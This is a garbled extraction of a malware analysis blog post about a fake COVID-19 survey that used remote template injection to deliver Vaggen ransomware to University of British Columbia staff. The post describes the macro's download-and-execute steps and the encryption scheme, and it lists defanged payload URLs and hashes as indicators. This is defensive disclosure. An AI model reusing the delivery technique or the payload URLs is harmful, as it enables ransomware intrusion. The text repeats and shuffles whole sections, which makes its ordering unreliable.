3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nThis post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.\r\nIn recent weeks, we’ve observed a number of phishing attacks against universities worldwide which we attributed\r\nto the Silent Librarian APT group. On October 19, we identified a new phishing document targeting staff at the\r\nUniversity of British Columbia (UBC) with a fake COVID-19 survey.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2160 of 3467\n\nHowever, this attack and motives are different than the ones previously documented. The survey is a malicious\r\nWord document whose purpose is to download ransomware and extort victims to recover their encrypted files.\r\nOn discovery, we got in touch with UBC to report our findings. They were already aware of this phishing\r\ncampaign and were kind enough to share more information with us about the incident. Ultimately, this attack was\r\nnot successful due to the rapid response of the UBC cybersecurity team.\r\nMandatory COVID-19 survey distributed to targeted recipients\r\nThe attacker created an email address with the mailpoof.com service in order to register accounts with Box.net\r\nand DropBox. Rather than directly sending the fake survey via email, the attacker uploaded the document onto\r\nBox and DropBox and used the share functionality from these platforms to distribute it.\r\nThis was probably done to evade spam and phishing filters that would have blocked messages coming from a\r\nnewly registered email address with a low reputation. In comparison, it is much more difficult to detect spam from\r\nfile sharing services without creating a number of false positives.\r\nThe attacker claimed to be a manager and added the following comment in the file sharing invitation (shared with\r\nus by UBC):\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2161 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2162 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2163 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2164 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2165 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2166 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2167 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2168 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2169 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2170 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2171 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2172 of 3467\n\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2173 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2174 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2175 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2176 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2177 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2178 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2179 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2180 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2181 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2182 of 3467\n\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2183 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2184 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2185 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2186 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2187 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2188 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2189 of 